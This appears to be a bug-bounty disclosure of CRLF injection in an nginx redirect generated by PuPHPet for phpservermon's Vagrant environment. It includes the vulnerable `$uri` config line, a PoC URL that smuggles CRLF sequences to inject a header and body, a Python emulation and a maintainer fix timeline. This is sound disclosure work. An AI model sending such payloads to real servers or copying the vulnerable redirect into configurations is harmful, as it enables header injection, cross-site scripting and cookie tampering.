CRLF Injection in phpservermon/phpservermon

Valid

Reported on

Nov 19th 2021


Description

A misconfiguration in the nginx virtual host that PuPHPet generates for the Vagrant environment leads to CRLF injection in the redirect it emits.

In nginx, $uri holds the normalized, percent-decoded request path, so %0d%0a in the request becomes a literal CRLF. Interpolating $uri into a `return` directive therefore lets an attacker terminate the Location header and append headers, or an entire response body, of their choosing. ($request_uri, by contrast, is the raw request target as sent by the client and is not decoded.)

code:

return 301 http://<%= @server_name[0].gsub(/^www\./, '') %>$uri;

Proof of Concept

A request to:

http://www.test.com/%0d%0afake_header:123%0d%0a%0d%0afake_content

is decoded into the Location header of the 301 response, so the first CRLF ends the Location value, `fake_header: 123` is returned as a separate response header, and the blank line followed by `fake_content` becomes the response body.
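The following is an added example, not code from the report or from phpservermon/PuPHPet. It emulates what nginx does with the PoC request target when the redirect is built from the decoded $uri versus the raw $request_uri, then parses the resulting response head the way a client would, so the injected header and body become visible. The hostname `test.com`, the request target, and the simplified header serialization are constructed assumptions for the demonstration.

```python
from urllib.parse import unquote

# Constructed sample input: the PoC request target, host assumed to be test.com
# (standing in for @server_name[0] with the leading "www." removed).
REQUEST_TARGET = "/%0d%0afake_header:123%0d%0a%0d%0afake_content"
HOST = "test.com"


def nginx_uri(request_target: str) -> str:
    """Approximate nginx's $uri: the path component, percent-decoded, query stripped."""
    path = request_target.split("?", 1)[0]
    return unquote(path)


def nginx_request_uri(request_target: str) -> str:
    """Approximate nginx's $request_uri: the original request target, untouched."""
    return request_target


def build_redirect(request_target: str, variable: str) -> bytes:
    """Emulate `return 301 http://HOST<variable>;` and serialize the response head.

    No escaping is applied to the Location value, which is the behaviour the
    report describes for the $uri case.
    """
    if variable == "$uri":
        location = f"http://{HOST}{nginx_uri(request_target)}"
    elif variable == "$request_uri":
        location = f"http://{HOST}{nginx_request_uri(request_target)}"
    else:
        raise ValueError(f"unsupported variable: {variable}")
    return (
        "HTTP/1.1 301 Moved Permanently\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def parse_head(raw: bytes):
    """Parse a response as a client would: the header block ends at the first blank line."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:  # lines[0] is the status line
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return headers, body


def injected_header_names(request_target: str, variable: str) -> list:
    """Headers that appear in the parsed response but were never set by the server config."""
    headers, _ = parse_head(build_redirect(request_target, variable))
    return [name for name in headers if name not in ("location", "content-length")]


if __name__ == "__main__":
    for variable in ("$uri", "$request_uri"):
        headers, body = parse_head(build_redirect(REQUEST_TARGET, variable))
        print(variable, "->", headers, "body:", body[:20])
```

With `$uri` the parsed headers contain `fake_header`, the Location value is cut short at `http://test.com/`, and the body starts with `fake_content` (the server's own Content-Length line is pushed into the body). With `$request_uri` the Location header keeps the percent-encoded sequences and nothing is injected, which is why `return 301 http://<host>$request_uri;` is the usual fix for this pattern. The same check can be run against a live host with `curl -sI` on the PoC URL and looking for `fake_header` as a separate line in the response.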

Impact

CRLF injection lets an attacker add arbitrary response headers and, by terminating the header block, supply a response body. This can be used to deliver client-side script (for example cross-site scripting) that discloses sensitive information such as CSRF tokens, or to set attacker-chosen cookies through an injected Set-Cookie header.

We are processing your report and will contact the phpservermon team within 24 hours. 2 months ago
We have contacted a member of the phpservermon team and are waiting to hear back 2 months ago
We have sent a follow up to the phpservermon team. We will try again in 7 days. 2 months ago
We have sent a second follow up to the phpservermon team. We will try again in 10 days. 2 months ago
We have sent a third and final follow up to the phpservermon team. This report is stale. 2 months ago
Tim Zandbergen validated this vulnerability 2 months ago
Dig2 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Tim Zandbergen confirmed that a fix has been merged on 162bba 2 months ago
Tim Zandbergen has been awarded the fix bounty
Tim Zandbergen
2 months ago

Thanks for notifying. Fixed by removing PuPHPet and updating Vagrant. I would consider the scope of this vulnerability to be low because the Vagrant environment is meant for development only.